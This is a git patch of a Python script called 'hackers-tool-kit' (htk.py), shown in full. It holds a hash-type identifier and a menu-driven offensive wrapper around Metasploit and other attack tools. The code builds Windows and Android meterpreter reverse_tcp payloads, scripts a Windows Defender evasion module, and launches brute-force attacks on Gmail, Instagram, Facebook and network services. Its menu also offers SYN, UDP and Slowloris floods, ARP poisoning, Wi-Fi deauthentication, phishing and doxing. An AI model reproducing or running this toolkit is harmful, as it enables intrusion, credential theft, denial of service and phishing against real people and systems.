hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > handler.rc') - os.system('echo "set payload {0}\n" >> handler.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> handler.rc') - os.system('echo "set LPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> handler.rc'.format(name)) - os.system('echo "run\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> handler.rc'.format(f)) - os.system('echo "show options\n" >> handler.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> handler.rc') - os.system('echo "services\n" >> handler.rc') - os.system("service postgresql restart") - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - found = True -mainbanner() -main() From c6f0b73a7a7b22c7e24c77b8aa78ebe22b24d1fe Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 06:18:38 +0100 Subject: [PATCH 030/214] Add files via upload --- htk.py | 1976 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1976 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..1639fb3 --- /dev/null +++ b/htk.py @@ -0,0 +1,1976 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to edit this script without my credit +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal +arppois : ARP poisoning +sslscan : ssl scan a host +payload : make a metasploit payload of your choice +crunch : Make wordlists +traff : shows your internet traffic +resa : reset account password +resu : reset unix password +hashid : find the type of hash of a hash +wafwoof : check a web application for firewall +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m 